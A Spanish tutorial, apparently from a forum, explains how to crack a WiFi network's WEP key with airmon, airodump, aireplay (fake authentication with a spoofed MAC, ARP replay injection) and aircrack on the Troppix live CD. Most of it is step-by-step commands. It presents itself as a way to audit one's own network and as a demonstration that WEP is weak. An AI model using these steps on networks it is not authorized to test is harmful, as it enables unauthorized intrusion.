Académique Documents
Professionnel Documents
Culture Documents
Por lo que he visto en el foro había alguna gente que pedía un manual básico
sobre redes Wireless en Troppix. Bien, aquí está, pero es muy muy básico.
NOTA: Este manual esta hecho para que cada persona compruebe la seguridad
de su PROPIA red Wireless, no me hago responsable de cualquier uso ilegal
que se le pueda dar a este manual.
La WEP es la clave que se usa para autentificarse como cliente "legal" ante el
Punto de Acceso, y que nos deje formar parte de una red, y por lo tanto
conseguir los servicios que se les da a los usuarios de la red(como por ejemplo
Internet). Así que, manos a la obra.
4. Averiguar la WEP
Para ello hay varios procedimientos, aunque todos se realizan con la suite
aircrack ya incluida (recomiendo bajarla en español e instalarla Aircrack en
español by Uxío). Yo recomiendo usar el CCW6 de Hwagm y Uxío , para
ahorrarnos escribir demasiado, aunque en el Troppix no se puede usar, así que
voy a poner el código escrito normal.
Código:
iwconfig
Quizá nos aparecerán varias. Nuestra tarjeta es la única que al lado no pone
"No wireless extensions" Quedad con ese nombre. La mía es "ath0", y cuando
escriba la voy a poner así, cada uno que la cambie por la suya.
Inicializamos la tarjeta
Código:
airmon.sh start ath0
Código:
airodump ath0 pruebas 0 1
Código:
iwconfig ath0 mode monitor channel 6 essid Uxio
Código:
airmon.sh start ath0 6
Código:
airodump ath0 pruebas 6 1
Código:
aircrack pruebas*.ivs
Como supongo que os daríais cuenta, los DATA suben muy lentos. Para que
suban más rápido debemos usar aireplay. Miramos los datos que aparecen en
la lista de abajo y cubrimos aquí los datos. Miramos que el BSSID coincida con
el de nuestra red. Si hay varios, nos vale cualquiera. Para escribir esto
abrimos otra ventana.
Código:
aireplay -3 ath0 -b BSSID -h STATION
A veces ni siquiera van a subir los DATA ni vamos a tener nada en la lista de
abajo que tenga que ver con nuestra red. Esto se soluciona de la siguiente
manera. Primero abrimos otra ventana y luego ponemos:
Código:
aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55
Código:
iwconfig ath0 rate 1M essid ESSID
y luego lo de antes.
Código:
aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55
Código:
aireplay -3 ath0 -b BSSID -h 00:11:22:33:44:55 -x 300
Si sale bien veremos que cuando lleve cierto número de READ empezarán a
aumentar ARP y SENT. Además en el airodump veremos que los DATA
empiezan a subir.
Después de todo esto tenemos que ejecutar el aircrack como ya dije antes
para averiguar la clave.
Como curiosidad (y salvación para algunos), las redes que son del estilo "PACO
27", sin barra (_), en aireplay quedarían así
Código:
-e PACO 27.
aircrack pruebas*.ivs
(Descifrar clave atraves de los ivs almacenados con airdump)
Tambien, podéis abrir con la aplicacion nautilus, un txt con esta informacion
para poder copiar y pegar con una cosola que lo permita como gnome.
Como muchos sabréis, Control + C en linux sirve para parar el proceso de la
consola asique cuidado, aunque también esto es util. Copiad y pegad a ratón.
Si os interesa este live mirad este tutorial para instalarlo en el disco duro
http://hwagm.elhacker.net/htm/livdcd-hdd.htm
7. Conclusiones.
Bueno, creo que con todo esto lo más importante ya está. Esto nos muestra lo
inseguras que son la redes basadas en claves WEP, y que simplemente con un
Live-CD sin tener experiencia en Linux se pueden romper.
Links:
http://rapidshare.com/files/405755212/troppix--i586-1.2.part1.rar.html
http://rapidshare.com/files/405785365/troppix--i586-1.2.part2.rar.html